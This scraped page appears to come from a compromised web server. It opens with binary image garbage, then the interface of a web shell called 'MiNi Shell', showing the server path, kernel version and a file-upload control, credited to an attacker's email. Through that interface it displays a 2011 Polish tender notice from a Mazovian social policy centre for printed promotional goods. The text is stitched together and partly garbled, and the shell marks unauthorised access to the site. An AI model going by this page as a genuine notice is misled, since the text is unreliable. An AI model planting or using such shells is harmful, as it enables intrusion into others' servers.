JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110526/149345-N-2011.html

<p class="kh_header"><b>Warszawa: Wykonanie materiałów promocyjnych PO KL wraz 
z dostawą do Mazowieckiego Centrum Polityki Społecznej</b><br>
<b>Numer ogłoszenia: 149345 - 2011; data zamieszczenia: 26.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowieckie Centrum Polityki Społecznej , ul. Nowogrodzka 62A, 02-002 Warszawa, woj. mazowieckie, tel. 022 6224232, faks 022 6224732.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcps.mazovia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie materiałów promocyjnych PO KL wraz 
z dostawą do Mazowieckiego Centrum Polityki Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Części przedmiotu zamówienia dotyczącego materiałów promocyjnych:
1)  3000 sztuk toreb papierowych z nadrukiem,
2)  1000 sztuk pendrive (pamięci USB) z nadrukiem,
3)  3000 sztuk metalowych długopisów z nadrukiem,
4)  3000 sztuk kompletu notesów (formatu A4, formatu A5 i o wymiarach 10x10 cm) z nadrukiem,
5)  1000 sztuk kalendarzy książkowych formatu A5, 1000 sztuk kalendarzy na biurko z nadrukiem i 1000 sztuk kalendarzy ściennych (trójdzielnych) z nadrukiem,
6)  1000 sztuk kompletu kolorowych znaczników papierowych z kalendarzem 
i nadrukiem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda składania wadium w postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych 
w SIWZ będzie stanowiło podstawę do oceny spełnienia warunków udziału 
w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów 
i oświadczeń czy Wykonawca spełnia ww. warunek</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych 
w SIWZ będzie stanowiło podstawę do oceny spełnienia warunków udziału 
w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów 
i oświadczeń czy Wykonawca spełnia ww. warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych 
w SIWZ będzie stanowiło podstawę do oceny spełnienia warunków udziału 
w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów 
i oświadczeń czy Wykonawca spełnia ww. warunek</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych 
w SIWZ będzie stanowiło podstawę do oceny spełnienia warunków udziału 
w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów 
i oświadczeń czy Wykonawca spełnia ww. warunek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych 
w SIWZ będzie stanowiło podstawę do oceny spełnienia warunków udziału 
w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów 
i oświadczeń czy Wykonawca spełnia ww. warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne, społeczne i Fundusz Pracy</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mcps.mazovia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mazowieckie Centrum Polityki Społecznej ul. Nowogrodzka 62A, 02-002 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2011 godzina 12:00, miejsce: Mazowieckie Centrum Polityki Społecznej ul. Nowogrodzka 62A, 02-002 Warszawa, Sekretariat - III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, realizowane przez Mazowieckie Centrum Polityki Społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem 1 części zamówienia jest wykonanie i dostawa do Mazowieckiego Centrum Polityki Społecznej 3000 sztuk toreb papierowych z nadrukiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiał: papier kredowany 250 g/m2, folia matowa, sznurek poliestrowy w kolorze brązowym. Wymiary i kolor: format: 24 cm (szerokość) x 35 cm (wysokość) x 10 cm (głębokość), usztywnione dno (tekturka), kolor torby kremowy, napisy - pełny kolor, druk na obu stronach (1 strona: logo POKL, logo EFS i nazwa projektu, 2 strona: logo i dane teleadresowe MCPS), zgodnie z projektem stanowiącym wzór nr 1 załącznika nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem 2 części zamówienia jest wykonanie i dostawa do Mazowieckiego Centrum Polityki Społecznej 1000 sztuk pendrive (pamięci USB) z nadrukiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: obudowa metalizowana w kolorze beżowym, pamięć typu flash drive: pojemność minimum 4 GB, interfejs USB 2.0 zgodna z USB 1.1, odczyt min. 15MB/s, zapis min. 10MB/s., wymiary: (+/- 10%) 65mm x 20mm x 10 mm, wyposażenie: dioda typu LED sygnalizująca aktywność; skuwka zabezpieczająca wtyczkę USB.
Napis - pełny kolor: logo PO KL, logo EFS, (wzór nr 2 w załączniku nr 5 do SIWZ), umieszczone po jednej stronie korpusu i logo MCPS umieszczone po drugiej stronie korpusu naniesione w sposób trwały w technice tampodruku, nie ulegające starciu pod wpływem pocierania palcem lub pod wpływem wody..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem 3 części zamówienia jest wykonanie i dostawa do Mazowieckiego Centrum Polityki Społecznej 3000 długopisów z nadrukiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: długopis z kolorowej stali nierdzewnej o kształcie walcowatym o długości (+/- 10%) 140 mm; długopis automatyczny, końcówka dolna przykręcana, uchwyt mocujący, wkład piszący o grubości linii (+/- 0,5 mm ) w kolorze niebieskim, mechanizm przyciskany, korpus długopisu w kolorze metalicznym beżowym, przycisk i klip w kolorze srebrnym Napis - pełny kolor: logo PO KL, logo MCPS, logo EFS i (wzór nr 2 w załączniku nr 5 do SIWZ), umieszczone 
w jednej linii po jednej stronie korpusu, naniesione w technice tampodruku na logo naniesione w sposób trwały, nie ulegające starciu pod wpływem pocierania palcem lub pod wpływem wody..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem 4 części zamówienia jest wykonanie i dostawa do Mazowieckiego Centrum Polityki Społecznej 3000 sztuk kompletu notesów (formatu A4, formatu A5 i o wymiarach 10x10 cm) z nadrukiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Komplet notatników ma składać się z 3 części: 
1) formatu A4, bloczek 50-kartkowy, papier offsetowy 80g/m2, wykończenie: usztywniona tylna okładka - spód karton 230 g/m2, kolor: papier biały w kratkę, druk 4+0, notes klejony wzdłuż dłuższego lewego boku, dwa otwory, dopasowane do ringu segregatora;
2) formatu A5, bloczek 50-kartkowy, papier offsetowy 80g/m2, wykończenie: usztywniona tylna okładka - spód karton 230 g/m, kolor: papier biały, druk 4+0, notes klejony wzdłuż krótszego górnego boku,
3) formatu 10 cm x 10 cm, bloczek 50-kartkowy, papier offsetowy 80 g/m2, wykończenie: usztywniona tylna okładka - spód karton 230 g/m, kolor: papier biały, druk 4+0, notes klejony wzdłuż górnego  boku. 
Na każdej kartce dwóch większych notatników należy umieścić następujące elementy (dostosowane do formatu): nazwa projektu, logo PO KL, MCPS, EFS i dane teleadresowe MCPS oraz informacja o współfinansowaniu ze środków unijnych, zgodnie ze wzorem nr 3a z załącznika nr 5 do SIWZ. Na każdej stronie najmniejszego notatnika - nazwa projektu, logo PO KL, MCPS, EFS oraz informacja o współfinansowaniu ze środków unijnych, zgodnie ze wzorem nr 3b z załącznika nr 5 do SIWZ.
Każdy pojedynczy komplet składający się z 3 notatników ma być dostarczony jako osobno zafoliowany..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem 5 części zamówienia jest wykonanie i dostawa do Mazowieckiego Centrum Polityki Społecznej 1000 sztuk kalendarzy książkowych z nadrukiem, 1000 sztuk kalendarzy biurkowych z nadrukiem i 1000 sztuk kalendarzy ściennych (trójdzielnych) z nadrukiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -  Kalendarz książkowy na 2012 rok w formacie A5, tj. 14,5 cm (szerokość) x 21 cm (wysokość), papier offsetowy 70 g/m2, gładzony, kolor papieru kremowy, druk: kalendarium - dwukolorowy, dwustronny.
Oprawa wykonana z wysokiej jakości ekoskóry w kolorze ciemno-beżowym (w ciepłej tonacji), szyta, z wytłoczonym logo POKL, MCPS I EFS. Kalendarium w języku polskim, 
z zaznaczonymi dniami wolnymi od pracy i świętami, imieniny na każdy dzień (solenizanci podwójni/potrójni). Na stronie układ dni: trzy dni od poniedziałku do środy a obok na stronie - cztery dni od czwartku do niedzieli, tasiemka do zaznaczania informacji. 
Na 1 stronie okładki wytłoczone logo PO KL, MCPS oraz EFS, zgodnie ze wzorem nr 4a 
z załącznika nr 5 do SIWZ. Wewnątrz wszyta jako pierwsza kartka z tekstem - dodatkowa kartka tego samego formatu, papier kreda 120 g/m2, pełny kolor zadrukowana na stronie 1: logo PO KL, MCPS oraz EFS i dane teleadresowe MCPS oraz nazwa projektu i informacja 
o współfinansowaniu ze środków unijnych (zgodnie ze wzorem nr 4b z załącznika nr 5 do SIWZ), na stronie 2: kalendarz na 2013. Druk: 4+0.
W kalendarzu dodatkowo informacje ogólne typu: (na początku) Plan kwartalny 2012, alfabetyczny wykaz imion, międzymiastowe i międzynarodowe numery kierunkowe, odległości drogowe w Polsce, wyróżniki na tablicach drogowych, (na końcu): wkładka teleadresowa w układzie alfabetycznym i ewentualnie - miejsce na notatki. W środku na oprawie na początku (2 pierwsze strony) - mapa Mazowsza, na końcu (2 ostatnie strony przed oprawą) - mapa Polski. Druk 4+0.
- Kalendarz biurkowy (stojący) na 2012 rok, poziomy, w formacie (po złożeniu do ustawienia) ok.13,5 cm (wysokość) x 21 cm(szerokość), czyli wymiar całości podstawy (tj. 2 boczki i podstawa: 32 cm x 21cm), karton 280-300 g/m2, folia mat., pełny kolor, kalendarium w układzie tygodniowym doklejone w sposób uniemożliwiający oderwanie się bloku kartek (klej odpowiedni do klejenia na folii mat,), wyraźne cyfry, zaznaczone dni wolne od pracy 
i święta; papier: 100 g/m2 offset, kolor papieru, podstawy - ciemno-beżowy, kalendarium - kremowy, druku 4+0.
Na podstawie: z boku wydrukowane logo PO KL, MCPS, oraz EFS, na górze nad kalendarium informacja o współfinansowaniu ze środków unijnych, na dole dane teleadresowe MCPS (zgodnie ze wzorem nr 4b  z załącznika nr 5 do SIWZ).
- Kalendarz ścienny trójdzielny na 2012 rok, podstawa - plecy o wymiarach: 72 cm (wysokość) x 30 cm(szerokość)  karton: 250-300 g/m2, folia mat., pełny kolor. Na podstawie miejsce na zdjęcie w formacie 19 cmx30 cm, pełny kolor, lakier UV, oprawione na tekturze 
z efektem wypukłości. Foto dostarczone przez Zamawiającego po podpisaniu umowy.
Kalendarium doklejone w sposób uniemożliwiający oderwanie się bloku kartek (klej odpowiedni do klejenia na folii mat,), w układzie 3 oddzielnych miesięcy w kolejności od góry: miesiąc poprzedni, bieżący i następny, wyraźne cyfry, zaznaczone dni wolne od pracy 
i święta, na kalendarium głównym założone okienko przesuwane wskazujące dzień tygodnia, druk dwukolorowy; wymiary 13cmx20 cm; papier 90 g/m2 offset, kolor podstawy - ciemno- beżowy, kalendarium - kremowy, napisy w języku polskim, druku 4+0. 
Na wolnej przestrzeni podstawy pod częścią 1 kalendarza wydrukowane logo PO KL, MCPS i EFS, pod częścią 2 - kalendarium głównym - informacja o projekcie i jego współfinansowaniu ze środków unijnych, na dole pod trzecią częścią kalendarium dane teleadresowe MCPS zgodnie ze wzorem nr 4b z załącznika nr 5 do SIWZ.
Uwaga: niezbędna jednolita szata graficzna kalendarzy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiotem 6 części zamówienia jest wykonanie i dostawa do MCPS 1000 sztuk kompletu kolorowych znaczników papierowych w skórzanym etui 
z kalendarzem i nadrukiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oprawa: wykonana z wysokiej jakości ekoskóry w kolorze w kolorze ciemno beżowym lub brązowym (w ciepłej tonacji), wymiary 12,5x10,5x2,5 cm. Na okładce etui wytłoczone logo PO KL, EFS oraz MCPS (wg wzoru nr 1  z załącznika nr 5 do SIWZ), wewnątrz następujące elementy:
- kieszeń z przezroczystej folii z wkładaną dwustronnie zadrukowaną kartką (kreda 150 g/m2, kolor kremowy, napisy - pełny kolor, z logo PO KL, EFS oraz MCPS, informacją o projekcie i danymi teleadresowymi MCPS, zgodnie ze wzorem nr 4b z załącznika nr 5 do SIWZ (1 strona) oraz kalendarzem na 2012 (2 strona), 
-  10 przegródek z kolorowymi znacznikami różnej wielkości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com